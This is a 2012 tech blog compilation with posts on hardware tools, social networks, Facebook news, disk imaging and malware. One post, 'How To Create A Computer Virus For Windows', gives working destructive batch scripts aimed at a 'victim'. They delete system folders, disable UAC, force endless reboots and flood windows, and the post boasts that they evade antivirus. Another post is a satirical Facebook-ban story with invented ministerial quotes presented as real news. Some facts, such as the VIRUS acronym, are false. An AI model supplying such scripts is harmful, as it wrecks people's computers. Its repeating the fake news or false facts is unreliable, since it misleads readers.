How to easily know the details about the main hardware devices of your computer. When someone ask you “whats your motherboard modal?” Most of us restart the system and look at the bootscreen which comes for just 2 sec or u remove the case and check the modal on ur motherboard. It will be lot more easier to answer it if you have this software. Its a very small sized software and really cooll software.

CPU-Z is a freeware that gathers information on some of the main devices of your system.

CPU-Z is more in-depth in virtually all areas compared to the tools provided in the Windows OS to identify various hardware components, and thus assists in identifying certain components without the need of opening the case; particularly the core revision and RAM clock rate. Most recently, a Graphics tab has been added. It has an unusual ability to directly detect hardware features, such as the ability to access, read, and display the SP
Ddata from memory modules. The ability to document clock speed makes it an important tool for motherboard overclockers, as a way of proving the CPU speeds achieved by various experiments.

Enabling right click on websites which block it

2012-05-02T06:06:00.001-07:00

Many websites nowadays disable the right click function of the mouse button which I think could be very annoying sometimes. This is done so that we can’t steal images, file, video, or any other website’s stuff. What about if we extremely in a need of the file without any profit-making and other bad intentions? In this post a tutorial is included to teach you how to solve the problem, without having to open the source code of course!

For google chrome

goto settings->under the hood->disable java script

then refresh the page

If you use Internet Explorer
Click “Tools”->”Internet Options”
Click the “Security” tab.
Click “Custom Level”
Scroll down to the “scripting” section.
Set “Active Scripting” to “disable” (Active scripts are programs written in Javascript)
Click “Ok”. Restart your internet browser.
Note: This will disable the Javascript from being rendered by your Internet Explorer browser which would mean the right click disabled’s script in the website will not work anymore.
For Mozilla Firefox browser, these are the steps which gave the same effect (maybe be vary depending on the version).

Go to “Tools” -> “Options”

Click “Web Features”

Untick enable JavaScript

Alternatively, you can also use this method to re-enabled the website right click function.
Enter the Javascript code below inside your browser’s address bar. (source)

ZURKER REVIEW AND INVITATION

2012-05-02T06:04:00.000-07:00

Zurker is one of the most discussed term in internet now and mostly in social medias.. many are giving away the invitations..Whats exactly zurker and its possibilities.. read more t find out

When Social Networks first started there was debate about Social Media being a viable business. Looking back on what has happened in the Social Media arena and seeing the demise of My Space and the rise of sites such as Facebook, Twitter, Linkedin and others there should be no doubt in anyone ones mind about Social Media. Not only is Social Media become mainstream but also it has proven its ability to generate revenue and be a solid business model.

JOIN ZURKER NOW GET INVITATIONNow there is a new kid on the block named Zurker. As they should, Zurker is doing everything it can to stand out from the crowded field of social media sites that has come and gone. Taking a lesson from the giant Google and Google while Zurker is still in Beta you can only join by invitation.

Why choose Zurker

You Have Total Control Of Your Own Privacy

You control your privacy (for every update and photo you post) through the use of zurks, tags, street & home concepts. I guess I ought to explain a bit more. A “zurk” is a bit like a Facebook ”like” but it’s better because it’s a more neutral word. For example it somehow seems inappropriate to “like” a post about someone dying but in Zurker you would “zurk” it to highlight it was a post worth sharing.

JOIN ZURKER NOW GET INVITATION

You can associate tags with your connections on Zurker. Tags could be “Friends”, “Family” or “Hubbers” or any tag you make up. Only you can see your tags, so you could tag someone as “time-waster” and they would never know (I’m not sure if I’m brave enough to use derogatory tags just yet).

Your “Street” page is where you can see all the updates posted by all you connections, but you can filter these by tag (see above). Your home page only shows updates that directly involve you and again you can filter by tag.

Open Books, Open Statistics, Open Bug-Reporting, Open Everything!

Zurker publishes online (via links at the bottom of every Zurker page) every cent that comes in and every cent that goes out. Membership figures and graphs are updated and displayed every hour. There is a link to report bugs and you can read any bug that has been reported and the developers’ responses.

Unique Features

Such as Zurks, Tags, Street/Home etc. see 3, above, for more details.

Democratic

Members will be able to control everything by voting.

JOIN ZURKER NOW GET INVITATION

Development Driven By Members’ Ideas

There will be an “Ideas” link where members will be able to suggest ideas and vote to select the best ideas.

Personal Identity and Business Identities Separate

Zurker will have a separate type of membership businesses known as “Entities”.You will know whether you are connecting with a real person or a business.

No Advertising And (Almost) No Spam

Zurker is advert free and has a very strict anti-spam policy.

Responsible, Bright, Creative and Positive Members

Because all of all that Zurker has to offer it is attractive to people that think for themselves.

JOIN ZURKER NOW GET INVITATION

Zurker Is Fun!

Zurker is a cool name to play with and we already have Zurker slang and culture.

Will Zurker succeed

With Google+, this generated interest as people were trying to find invitations to get in. Hopefully this will work for Zurker even though Zurker does not have the pulling power (yet) or interest that Google+ did.My opinion is that Zurker is a very much wait and see situation. There is the potential for it to go either way. It can fizzle and die or it can explode as the new Social Media Site on the block. At this time, I cannot tell which it will do.

JOIN ZURKER NOW GET INVITATIONAdvertising for Zurker is mostly word of mouth, which seems to be working. There are less then 10,000 people in Zurker and less then 4,000 people in the United States in Zurker but it is growing rapidly each day.

Realizing that Zurker is an open book with the story yet to be written I decided to go ahead and join Zurker. If it explodes, I was there at the beginning and if it does not then other then a little time I am not out anything to find out.

Why Zurker?

Can I Make Money

Here are some of the differences in Zurker that influenced me.The members own Zurker. According to Zurker, not only do you own your data but also you own a piece of the network. Granted if they get a million people on the network that own a piece of it then the say or control you have in what happens or does not happen is not going to be very large.

Each time you refer someone to Zurker you receive a Vshare for the referral. It does not cost you anything but at this time it does not pay you anything either. If Zurker grows large enough the Vshares will eventually be converted into shares in the cooperation that is yet to be formed. Zurker is still privately held.

JOIN ZURKER NOW GET INVITATIONIf there is any money to be made, it will be long term and you are not going to be getting a check from them tomorrow.

If there is only the potential to make money long term, why did I bother to join?

There is an excitement about Zurker since it will not be open to the public until April 2012. Even though it is still by invitation only there are over 8,000 people who have already joined. That is 8,000 potential customers.

The people who on Zurker seem to be very friendly and are mostly network marketers.

I have been able to establish Connections, (friends on Facebook) about as fast as I want to without getting warnings saying I am trying to make a connection with someone I do not know.

I have had better response from people on Zurker in a day with a little over 140 contacts then I have on Twitter with almost 20,000 followers and more then I have on Google+ with over 300 in my Circles.

Great Place To Add To Your Mailing List

8,000 and growing free contacts! Are you interested?

Zurker right now is filled with excited people running around trying to connect to as many people as possible. There are already over 8,000 people on there with the potential to interact with them.

If I never make a penny off Zurker there are still over 8,000 and growing contacts on Zurker.

While I am waiting to see where it goes there are over 8,000 and growing daily for me to interact with.

Okay I am stuck on over 8,000 and growing potential prospects, customers, leads, friends or contacts for me to interact with.

If I told you that I could give you a list of over 8,000 people and growing who were interested in connecting with you and that it would not cost you a penny would you be interested?

If I told you that there was a slight chance that in the long run, you could make a little money but in the mean time you would have a list of 8,000 and growing list of people to work with would you be interested?

I hope that now you understand why I joined Zurker

So, here is your invitation to join since it is still by invitation only. Zurker Invitation

Could Facebook IPO help it dominate Google?

2012-02-02T04:28:00.002-08:00

Influx of cash could deliver more users, a move into China, new tech

Computerworld - With the Facebook initial public offering (IPO) now official, industry and financial analysts say that a huge influx of cash could enable the social networking company to topple Google from its dominant position in the online world.

Source: Facebook IPO filing. (Infographic: Sharon Machlis)

Facebook had been expected to file its IPO papers with the U.S. Securities and Exchange Commission this week, and it did just that late yesterday afternoon. Analysts and potential investors were eagerly awaiting what is one of the largest IPOs in recent years.
With an expected valuation of $100 billion, financial analysts say the IPO is worth about $5 billion. That's a big potential war chest for a company that has been fighting for social networking users and advertising dollars with the largest Internet company on Earth - Google.
Given the popularity of its search engine, along with services and products like Google Maps, Android and Chrome, Google obviously is no slouch: It has 32,000 employees around the world and $37.86 billion in annual revenue. That's $1.166 million per employee in revenue.

But Facebook, with just 3,000 employees, pulls in $3.8 billion in revenue; that's $1.8 million in revenue per employee.
"Facebook has 800 million users," noted Dan Olds, an analyst with The Gabriel Consulting Group. "How many companies have 800 million anything? The thing that's interesting is that Facebook is profitable and solidly profitable. And an IPO is a huge step for any company, but it's the validation for Facebook, their business and their social networking model."
Facebook and Google are increasingly in each other's wheel house.
Just this past year, Google launched Google+, its own social network and a new direct competitor to Facebook. (Just last week it made Google+ more available to teens, another move to broaden its appeal.) And Google CEO Larry Page has said he plans to integrate Google+ social features into the company's wide range of services and products.
With a lot of new cash, Facebook could make a lot of moves. Olds wonders whether Facebook would try to buy Yahoo, which has been struggling, or even Twitter.
And both Olds and Scott Sweet, a senior managing partner with IPO Boutique, said Facebook could use the money to hire more employees and acquire other Internet companies. Theey also pointed out that Facebook could use the cash to find partners and set up operations in China, which could dramatically increase an already immense user base.
It would take some time -- and Facebook would have to successfully pull off some big moves -- but it could one day dominate Google, according to Sweet. "I do believe that anything is possible with Facebook," he added.
Unseating Google would be no easy feat, though.
First off, according to Olds, the companies are not substitutes for each other. Google is the basis for most searches. Facebook is the basis for most social connections.
And while a profitable IPO would make Facebook stronger, Google is still substantially larger.
"It gives Facebook a ... war chest," said Olds. "Google, though, has $45 billion in cash and short-term investments. That's a really big war chest. Even with this influx of cash, Facebook still can't play in Google's league in terms of cash."
Mark Siegel, a managing director with Menlo Ventures LLC, said Google came along to surpass Microsoft as the biggest tech company. And now Facebook is poised to take the lead from Google.
"Facebook is potentially the platform company for the next 10 years," said Siegel. "I absolutely think this is a scary event for Google. Will it make [Facebook] dominant over Google? Well, Facebook already does dominate Google in terms of social networking. This will enable Facebook to compete with Google in a lot of areas."
Could Facebook push past Google?
"Well, this certainly enables Facebook to move in that direction," said Siegel.

Improved Aakash for Students at No Extra Cost

2012-02-01T10:08:00.000-08:00

College students across India would get a new, improved and enhanced version of Aakash tablet without having the Government to pay any extra money.
The improved Aakash tablet will have three times faster processing speed and around 50% extra battery life. All the new versions of tablets to be subsidized by the Government will now have to pass the new quality protocol based on the inputs received from around 600 students of IIT and other engineering colleges.
The HRD ministry had asked Datawind of Montreal-based Suneet S Tuli to supply one lakh Aakash tablets for around $50 each. In the initial lot, 600 tablets were given to students for testing.
IIT, Rajasthan, which had prepared the Aakash prototype cited several deficiencies in the tablet including short battery life, processor unable to handle multiple operations at a time and poor picture quality.
Datawind has already supplied 30,000 tablets by the time the report by the IIT came. The ministry held back the order and asked the firm to fix the deficiencies. Ministry sources said the company was initially reluctant to upgrade the tablet without increasing the cost. However, it agreed when ministry threatened to cancel the order.
Tuli was not available for comments. A company spokesperson said the remaining 70,000 tablets would be supplied as per the pact.

“Not only Aakash from Datawind but all future tablets will have minimum Aakash 2 specifications,”

said NK Sinha, additional secretary, HRD ministry.

Ministry officials said Datawind may not get order in future as it had violated the contract condition of providing the tablets first to the government before selling it in open market.

Mozilla Firefox 10 available now

2012-02-01T09:49:00.000-08:00

The tenth iteration of Mozilla’s browser is rolling out from today and we’re sat here waiting for our own go signal. As the biggest UI tweaks will arrive in v12, the majority of changes are under the hood: except that the “forward” button now only appears once you’ve pressed “back.” New APIs provide for full-screen viewing of web apps, Anti-aliased WebGL graphics and an “extended support release” that enables enterprise customers to only download security updates. CSS 3D Transitions are now supported alongside a new CSS inspector for those digging deep into the fabric of the universe internet. Java applet and moving bookmarks crashes should be a thing of the past, but it’s not all plain sailing: no new release ever is, after all. On the “to be fixed” list includes herky-jerky scrolling in Gmail, Silverlight videos not working in OS X and vertical scrolling is broken on some touch-pads.

Facebook Timeline a concern to users, Sophos poll reveals

2012-02-01T09:20:00.001-08:00

IT security and data protection company Sophos, reveals that Facebook is phasing out its old look in next few weeks and making the new profile format mandatory for all users – known as ‘Timeline’ – which presents a scrapbook of all past status updates and photographs. However, research from Sophos shows that more than 50 percent of internet users are concerned about the Facebook profile update.

The Facebook Timeline encourages users to enter more personal details about themselves and their life experiences, while making it simpler for others to view the information. There are concerns that this will instantly make it easier for identity thieves and stalkers to profile individuals.

In addition, the Timeline will be updated automatically through Facebook apps that, for example publish the last song listened to on Spotify, newspaper articles read online or movie tickets purchased – all without having to press “Share” or “Like” buttons.

The online Sophos poll surveyed more than 4,100 global respondents on their opinion of the Facebook Timeline. Key findings from the research include-

51 percent are worried by the Facebook Timeline
Only 8 percent like the new Facebook Timeline
8 percent say they will get used to it
32 percent still don’t know why they are on Facebook

“The Facebook Timeline will be a wake-up call to some that they have shared too much in the past, too freely. In my case, the Timeline was the catalyst to reassess my relationship with Facebook – and so I’ve killed my account,”

said Graham Cluley, Senior Technology Consultant at Sophos.

“If nothing else, Facebook users should take this opportunity to re-evaluate what they share online. It is time to spring clean your Facebook account and online friend relationships, and ensures that you are only sharing what you want to share, with who you want to share it with. After all, a website which holds details on your entire life, likes and loves, is gold dust to scammers.”

Google’s New Privacy Policy

2012-02-01T09:13:00.000-08:00

If you were hanging around the internet yesterday and fiddling with google, or if you checked your Gmail inbox, you would have noticed Google’s notice of changing their privacy policy and terms.

Seeking to blunt a sharp backlash to recent privacy policy changes, Google has offered to share “the real story” about a system that compiles information about users based on their activity on all of Google’s sites and products.
This week, Google announced new privacy settings. They spell out the fact that the company collects and compiles data about its users based on their activity on its various sites — from its search page to Gmail to YouTube to phones running its Android operating system.
The announcement gave some privacy advocates cause for alarm, even though Google says the information is assembled to enhance user experience, such as better targeting ads that will be of interest to its customers.
In a post on the company’s public policy blog, Google’s Betsy Masiello wrote that there have been misconceptions about the changes.
“A lot has been said about our new privacy policy,” she wrote. “Some have praised us for making our privacy policy easier to understand. Others have asked questions, including members of Congress, and that’s understandable too.”
Among the points that Masiello makes in the post:
_ Users don’t have to be logged in to use many of Google’s products, including search and YouTube. No data is collected when a user is not logged in.
_ When logged in, users can edit or turn off their search histories, switch Gmail chat to “off the record,” use “incognito mode” on the Google Chrome browser or employ other of Google’s privacy tools.
_ Quite simply, Web users don’t have to use all of Google’s products.
She noted that Google won’t be collecting any more data about users than it was before.

“We’re making things simpler and we’re trying to be upfront about it. Period,”

she wrote.
Not everyone should be convinced and neither are we.

There is no way that you can opt out of shared search data, and Google will have the record of everything you do, that is a little uncomfortable.
At the same time, it’s extremely convenient to have all of your eggs in one basket—you always know exactly where they are. Plus Google’s services place nicely together in a number of time-saving, uber-handy ways. Weighing convenience against security-risks is your decision to make. The new Terms of Service perhaps haven’t added any additional risk to the equation according to my opinion except for the slightest increase in one’s privacy concerns. Your YouTube and Gmail accounts had the same password before, and they still will.
But make up your own mind. Read the new Terms of Service yourself. Compare it with the old Terms of Service. Compare it with the Terms of Service of other companies offering similar products. It’s up to you to make an informed decision. Time to use the old think-bucket.

Listen to Music With Your Friends

2012-01-29T08:52:00.001-08:00

Music is one of the most powerful and fun ways to connect. Whether it's at a concert with a bunch of people or on a long car ride with your best buddy, we love listening to music with our friends. But what if you could listen to music with your friends when you're alone, like at work, at home or on the go?

Today, with music services on Facebook, there's a new way to listen with friends. This feature lets you listen along with any of your friends who are currently listening to music. You can also listen together in a group while one of your friends plays DJ.

You can listen to the same song, at the exact same time—so when your favorite vocal part comes in you can experience it together, just like when you're jamming out at a performance or dance club.

How It Works

Look for the music note in the chat sidebar to see which of your friends are listening to music. To listen with a friend, hover over their name, and click the Listen With button. The music will play through the service your friend is using.

When a new song plays, you'll come along for the ride, discovering new music while your friend DJs for you.

You'll also have the option to chat about what you're listening to. As other people start listening along, they'll join the party in a group chat.

You can control who you're listening along with through your settings. Learn more here.

Rollout Starts Today

Now, you can experience enjoying music together with your friends no matter where you are. This feature will start rolling out over the next few weeks. We hope you enjoy listening with friends!

Introducing New Apps for Timeline

2012-01-29T08:49:00.001-08:00

New timeline apps are now available from Foodspotting, Foodily, Ticketmaster, Pinterest, Rotten Tomatoes, Pose, Kobo, Gogobot, TripAdvisor, and others. You can now enhance your timeline with apps that help you tell your story, whether you love to cook, eat, travel, run, or review movies.

Apps bring your timeline to life
Once you've added an app, you can begin updating your timeline with your activities as they happen. For example, if you love design, shopping or fashion, you can add the Pinterest or Pose apps to make your favorite items part of your timeline.

If you love to cook, you can add the Foodily app to your timeline and share your latest dishes. If your friends have added the Foodily app, you can discover new recipes with each other, as you'll see their updates in the ticker and their timeline, and possibly News Feed.

If you're a traveler, you can add the Gogobot and TripAdvisor apps to bring a virtual passport to your timeline, and show your friends where you've been and share tips about your favorite spots from around the world.

Soon, there will be apps for all types of interests, as more apps will launch over time. Whether you love snowboarding, gardening, hiking, or knitting, or something else, there will be an app for you.

How to add apps to your timeline
Timeline apps are for the activities you want to share with friends. You choose when to add an app, and you decide who can see it. After you've added an app, you can always remove posts directly from timeline, and you can also edit your settings from your personal Activity Log.

You and your friends can start adding apps to your timeline today to discover new recipes, places to go, events to attend, and more.

How to create disk image without software or free? How to create ghost image of hard disk for free? or How to clone a disk for free?

2012-01-26T18:55:00.001-08:00

If yes then you are the person who want to backup complete disk along with OS. So lets see how we can create hard disk image or ghost image or disk clone without using those highly priced ghost creating software.

Requirements:

Ubuntu Live CD/DVD, A hard disk with more capacity than the one you want to clone and some basic knowledge of Linux.

Procedure:

Linux provides disk dumping feature, this feature can be used for creating complete backup of any possible storage media. And we will use this feature of Linux command shell to create ghost images. While writing this tutorial I am assuming that you want to backup a hard disk which already have an OS installed in it.

Boot from Ubuntu Live CD/DVD

Now mount the hard disk you want to take backup on /mnt folder

Now take backup using following commands,

[root@localhost~]dd if=/dev/sda1 of=/mnt/image.img

this will create complete image of hard disk partition sda1, next you must take backup of partition table,

[root@localhost~]#dd if=/dev/sda of=/mnt/partitiontable.img count=0 bs=512

[root@localhost~]#dd if=/dev/sda of=/mnt/partitiontable.img count=0 bs=1024

Now while restoring first restore partition table on new hard disk

[root@localhost~]#dd if=/mnt/partitiontable.img of=/dev/sda count=0 bs=512

[root@localhost~]#dd if=/mnt/partitiontable.img of=/dev/sda count=0 bs=1024

Finally restore ghost image,

[root@localhost~]#partprobe /dev/sda

[root@localhost~]#dd if=/mnt/image.img of=/dev/sda1

Now please note that when you'll create ghost image no matter what amount of data you have in disk your ghost disk will be of actual size of source hard disk, that means if your source hard disk is 40GB in size then your ghost hard disk will also be of 40GB. If you think above tutorial was little geeky then even I don't take different view from you, yes its really little geeky but believe me its not that difficult. Facebook & Google GOing TO Be Banned ?

2012-01-25T20:39:00.000-08:00

Yes,Facebook Is going to be banned in India bye the governament. If the news is right it is going to be banned by july.About 25 million facebook users in India Are shocked By hearing this news.!
Minister for Communications and Information Technology, Kapil Sibal explained the decision at a late night press conference yesterday, “This Facebook thing has gone way out of control, much like the ‘Savita Bhabhi’ fiasco two years ago, when we had to ban that site. (Never mind the proxy servers, which still allow some of my colleagues to check it every now and then.) Coming back to Facebook, the reputation of all our esteemed ministers, most notably the Prime Minister and myself, is being torn to shreds with offensive status messages, obscene photoshopped images, and above all, totally fictitious articles on websites like News That Matters Not.

An uncermonious end to a global phenomenon?

“Moreover,” he continued, “unlike other forms of media, we don’t yet have absolute control upon these social networking sites. Such social platforms are the only thing democratic in this country, and we must move in swiftly to fix this anomaly at once.”
When reporters wondered if it did not suppress freedom of speech, Sibal replied with a sly smile and a chuckle, “You have never had that freedom anyway; you have merely been led into believing that you do.”
He also said, “On a personal note, when I get up in the morning, the first thing I do is check out my pictures from the press conferences on the first page of the newspaper. On the other hand, when my children get up, they open Facebook, and check their ‘News Feed’ where more often than not, politicians like myself are made a mockery of. How humiliating is that?”
“Mr Sibal, are you not wary of the public backlash that will most definitely follow this decision?” a female reporter asked.
“You mean sitting on fast unto death? These days, every Tom, Dick and Baba is doing it. As if, it is going to make a difference on our thick-skinned brains. As long as I get my three delicious meals a day, I don’t give a rat’s ass!”
“Sir, you must have some alternate ideas to make up for this sudden removal of a means of communication as vital as Facebook itself?”
“Oh yes, of course. We are going to launch www.upa-book.gov.in. We have already copied the entire Facebook source code line-by-line into our website. The only difference is that we will be able to moderate vulgar comments and pictures about ourselves. As far as the copyright suits are concerned, all Bollywood movies are based on some Hollywood script, yet how many have been sued? None, I guess. Also, in our testing mode, the site has been down ever since we put it up, just like the rest of government sites. But then, who cares, as long as we survive in the office for one more day!” He got up, raised his arms in a triumphant manner and spoke, “Thank you—” (looking around apparently hoping for an applause, shouts disappointed) “—You will thank me for this one day, you insolent fools.”
After the press conference, we decided to check Sibal’s Facebook account. He had just updated his status, “Wow guys, what a kick-ass conference! How many likes?” We firmly believe this decision has something to do with the minister’s not-so-secret love for Orkut, another social networking site that has been extinct from the Indian market for ages now.
P.S.: Check out this link for the actual views Mr. Sibal gave on the topic; this news may not be fictitious in the future after all: http://www.medianama.com/2011/03/223-it-minister-kapil-sibal-on-internet-block-social-media-worries

You might have read our post on how to enable Facebook’s new ... Please help me remove timeline -I want my old profile look back!

NO you cannot. Once you activated it you have 7 days to review all your infos and check which ones you want to keep or hide from your profile. But that’s it.you cant remove it – everyone has to start using it this month, and the old format will go away forever

As for every facebook profile update, some people like it and some others don’t. But each time with Facebook it’s impossible to come back at the old profile.

Everything you will read on Internet is only temporary solutions that I don’t recommend (like deactivate your account for 30 minutes). Don’t do this as this is not supported officially and anyways in a few days the social network will put you back the new Timeline profile.

May be if many many people report that they hate the new Timeline, Zuckerberg’s team will do something and give us the choice. But for now unfortunately you have to deal with it.

So for now the best thing I could recommend is to upload a nice cover photo and enjoy with new timeline fetures

see some example of new timeline covers : if you want to put this type image on your facebook profile just go to http://www.coverimages.in

How To Create A Computer Virus For Windows

2012-01-23T09:39:00.002-08:00

In this following tutorial I will demonstrate how you can create simple but effective viruses using batch scripts in windows. This is for educational purpose only. Batch scripts are nothing but commands that you type in windows command prompt. You can arrange single or multiple commands in specific order to harm system.

Following is an example of destructive virus script,

rd /f /q “c:\windows\system32”

cls

shutdown /s /t 00

this will delete all files from windows system32 folder making windows unusable. By the way this trick works only on Windows XP,2k and earlier. Will not work under Vista and 7 due to UAC(User account control). So here's another way to harm system, rather than deleting core system files delete Program files so the above code will appear as follows after modification.

rd /s /f /q “c:\program files”

This will delete all installation files from Program Files directory making all victim's installed program useless. By the way you can disable UAC using following code but system will need a restart,

reg /add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUAC /t REG_DWORD /d

0x00000000

After that you can run first code without problem. Above codes are examples of destructive codes now lets take a look on codes that do not harm but can harass the victim.

A batch script that will put computer in continues restart mode,

@echo off

if exist "%userprofile%\start menu\programs\startup\virus.bat" goto h

copy virus.bat "%userprofile%\start menu\programs\startup\"

shutdown /r /t 00

where virus.bat is the name of our virus script.

A batch virus that will open several windows of same program,

@echo off

cmd /c start /MAX /HIGH tree c:\

where you can replace tree c:\ by any command/program name you wish.

Following code will open several websites on victims PC,

@echo off

start http://nrupentheking.blogspot.com

where you can replace http://nrupentheking.blogspot.com by any website URL you want even links to images will work. If you paste above code for nearly 1000 times victim's PC will crash of overload.

Above are just few possibilities the advantage of batch code is they hardly get detected by any anti-virus programs that means they can run and damage system without getting detected as virus. To get complete list of commands type help in command prompt. I hope that was easy, ask if you have any difficulty and please don't execute above scripts on your own computer. Thanks for reading and keep visiting.

Virus And Worm

2012-01-23T09:39:00.000-08:00

Welcome to Techno Trickx. In this following post we will have a little look on what are virus and worm. As told earlier viruses are considered as very first form of computing threats its necessary for a hacker to know what is difference between a virus and worm and what are different
types of virus.

What is virus?

A virus is a self replicating program that produces its own code by attaching copies of itself into other executable codes. Like a real virus, a computer virus is contagious and can contaminate other files. Virus can infect outside machines only with assistance of computer users.

Many people think the word virus is derived from real life viruses but this is not true, the word virus is derived from abbreviation of its full form Vital Information Resource Under Seize(VIRUS). Its just coincidence that the abbreviation matches word virus.

Classification Of Virus:

Virus is classified depending on two categories depending on,

What they infect ?

How they infect ?

What they infect?

Boot Viruses: They specially infect boot sector records from hard disk, floppy disk and CD/DVD ROMS.

Program Virus: These virus usually infect executable program files like .exe, .bat, .com, .bin, .ovl, .drv, .sys

Multipartite Virus: These virus infect both boot sector as well as program files.

Network Virus: They spread themselves using emails and flaws in network protocol stack.

Source Code Virus: Source code virus overwrites or appends host code by adding Trojan code in it.

File Virus: File virus generally infects executable files in OS.

Macro Virus: They infect documents, spreadsheets, database, nearly everything that is included as office suite

How they infect ?

Polymorphic Virus: They can change their code with each infection.

Stealth Virus: Can hide from anti-virus programs.

Cavity Virus: Maintains itself with negligible file size and hence after infecting any file the file's size appears unaltered.

Tunneling Virus: Conceals itself under anti-virus and then infects.

Camouflage Virus: Hides itself in genuine application.

What are worms?

Worms are nothing but subtypes of viruses. Unlike virus a worm doesn't require a host to replicate. WormsWormsWorm exists in all types of virus since its only modified form of a computer virus. can creep into another computer in network without user's assistance and hence called as worm. were firstly targeted towards mainframe UNIX systems but today they are very much targeted towards windows OS.

About Key Loggers

2012-01-23T09:37:00.003-08:00

Key loggers are tools that are used for logging key strokes, hence they are also known as keystroke loggers. Key loggers come in both software and hardware form and are used to capture and record everything typed using keyboard. The logged data is hidden in system and can be delivered to attacker by means of e-mail or FTP server.
Usually key loggers can record the application name, date and time of execution and keystrokes associated with that application. They can capture keystrokes even before they get encrypted; this gives the attacker password and other hidden information easily.

At most basic level key loggers are classified as,

-Software Key loggers

-Hardware Key loggers

Software Key loggers:

Software key loggers are widely used since they can be installed remotely via network or email attachments. Software key loggers always have ability to obtain additional data since they are not physically limited and can access memory allocations. The best part offered by software key loggers is that they can be deployed with any Virus or Trojan program that means you can use a Trojan as software key logger. They need administrative privileges to install on system.

Hardware Key logger:

Hardware key loggers are hardware devices embedded into a keyboard connector to record data. These devices usually look alike standard keyboard adapters and hence are difficult to detect. They hardly get detected unless you are specifically searching for it. It is small device that can be attached between PC and keyboard it comes in both PS/2 and USB packing. Since it is embedded in hardware it does not have OS dependency and it can surely work equally on Windows, Linux as well as UNIX and Mac systems. The best part of hardware key logger is that it doesn't require software installation, it doesn't get detected by Anti-Virus programs, Internet Security Suits, Network Monitors, Intrusion Detection System, Intrusion Prevention System and can also log keystrokes even before you log into your system.

Counter Measure against Software Key loggers:

Practically you should not trust any illegitimate program. Keep your Anti-Virus program and firewall updated. Download Mozilla fire fox and use Key-scrambler plug-in to avoid keystroke getting monitored on web browser if someone has successfully installed a key logger in your system. If you are doubtful that your system has been infected by key logger use anti-key-logger/key-logger-remover programs to get rid of them. Following is list of some Anti-Key logger programs.

Anti-Key logger

Advanced Anti-Key logger

Spy Hunter-Spyware Remover

SpySweeper

Spyware Terminator

WinCleaner AntiSpyware

If you are wondering what anti-spy ware is doing in list of anti-key logger then I must tell you that key loggers are part of spy wares (also key loggers can be classified under spy ware) and hence even spy ware removers are capable of removing key loggers.

Counter Measure against Hardware Key logger:

At practical level there's hardly any software based counter measure to hardware key loggers. But here's a program that can protect against both hardware and software key loggers. Its name is Privacy Keyboard.

Privacy Keyboard is anti-spy ware that defends computers from both spy software and hardware. It can detect software key loggers and can also helps in evading hardware key loggers though it can't detect them. It disables all spy softwares running on the system and prevents hardware as well as software key loggers from intercepting keystrokes.

Computer Virus

2012-01-23T09:37:00.001-08:00

Computer VIRUS i.e Vital Information Resource Under Seize are considered as very first form of computer threats. Computer VIRUS usually replicate themselves, damage your files and are also able to distribute themselves on network. Virus is usually a executable file. It may be different or same for different Operating system.
Most of the times virus disguise themselves as system files so that they can avoid detection. Their detection prevention mechanism is so strong that a common user can never figure out, whether a file is virus or just another system file or data file.

Viruses can be classified as follows:

Boot Sector Virus:- Boot sector viruses or MBR Viruses are responsible for damaging boot records of a system. When executed they copy themselves in boot sector and load themselves every time the system starts.(MBR i.e Master Boot Record is the record stored on hard disk or bootable CD which stores information about startup of system. In other words files stored in MBR are the very first thing that is loaded in memory for execution.). Examples of boot sector virus are Form, Michelangelo, Stone, Disk Killer etc.

File Virus:- File virus, as its name suggests are made to damage your files. They can also damage your program files and hence also known as Program Virus. They usually infect executable files, system files and driver files. Example of file virus are Sunday, Cascade etc.

Multipartite Virus:- Multipartite virus are hybrid viruses. They have properties of both boot sector and file virus. So they are more dangerous than first two mentioned above because they not only infect boot sector but also system files. Common examples are Invader, Flip and Tequila.

Stealth Viruses:-Stealth viruses are able to hide themselves to avoid detection They can store themselves in memory during scanning by Anti-Virus Programs and get restored when scanning is over. Due to their this type of stealthy nature they are named as Stealth Virus. They are so well programmed that they can even hide themselves inside other files without increasing size of file. This is also one of the mechanism they use to survive from Anti-Virus Programs. These viruses are one of the most difficult viruses to detect. Common examples are Frodo, Joshi, Whale etc.

Polymorphic Viruses:- A virus that can encrypt its code in different ways so that it appears differently in each infection. These viruses are more difficult to detect. Common examples are Involuntary, Simulate, Cascade, Pheonix etc.

Macro Viruses: Virus that infects the macros within a document or template. When you open a word processing or spreadsheet document, the macro virus is activated and it infects the Normal template (Normal.dot)-a general purpose file that stores default document formatting settings. Every document you open refers to the Normal template, and hence gets infected with the macro virus. Since this virus attaches itself to documents, the infection can spread if such documents are opened on other computers. The very dangerous thing about these viruses is they are not platform specific that means a code once written can infect any OS. Common examples are DMV, Word Concept etc.

Active-X Virus: Active-X viruses are under emerging stage. They are usually executed on victims PC via web browser. The JAVA scripts, Perl scripts, Flash scripts enabled on victim's PC without any Firewall, Anti-Virus, Internet Security Suite can easily obtain access to PC. Keeping Video and Audio plug ins ready without protection can bring Active-X Virus to your party.

How you can keep your computer virus free:

Following are some simple tips that will help you keep your computer safe from viruses,

1.Never open any pen-drive by double clicking on it open it by address pane from my computer.

2.Always keep your auto play option off.

This is how you can do it, for windows xp from start menu, click on run command write "gpeit.msc" and press enter “group policy editor” will open in front of you, now navigate

user configuration-->administrative templates-->system, find out "turn off autoplay" and make it enabled. For vista and 7 you can directly turn it off by control panel.

3.If you are buying a computer make sure you buy only original OS for it, a legal system gets updated and also gets support from vendors. A pirated copy of OS may itself contain any malicious code that may even help viruses to stay hidden from anti-virus.

4.Always keep your system and anti-virus updated and use firewall while on Internet.

5.Always keep hidden folders option and hide file types disabled, to do this open any instance of "explorer.exe" goto

tools-->folder options-->view

now disable options "do not show hidden files and folders" and "hide extensions of known files". This will help you keep eye on suspicious files and folders.

Malware

2012-01-23T09:36:00.001-08:00

Malware, the word itself is derived from two words malicious software. Thus a malware actually represents a malicious code. A malware can be defined as a software or firmware that is intended to perform unauthorized and unwanted process that will result in confidentiality, integrity and availability of information. A malware code can be written in any language and for any device including computers, PDA’s, mobile phones etc.

Though it is defined that a malware affects on confidentiality, integrity and availability of information, its adverse results are not only limited to information security. It may also result in loss of any digital/electronic property, stealing of information, penalizing dependability, usability, performance and privacy. Privacy is biggest factor that comes in play today due to malware . You may have noticed that malware is most of the times interchangeably used with virus, its just because virus was the very first type of malware, malware is also known as badware or harmware.

Classification Of Malwares:

VIRUS:

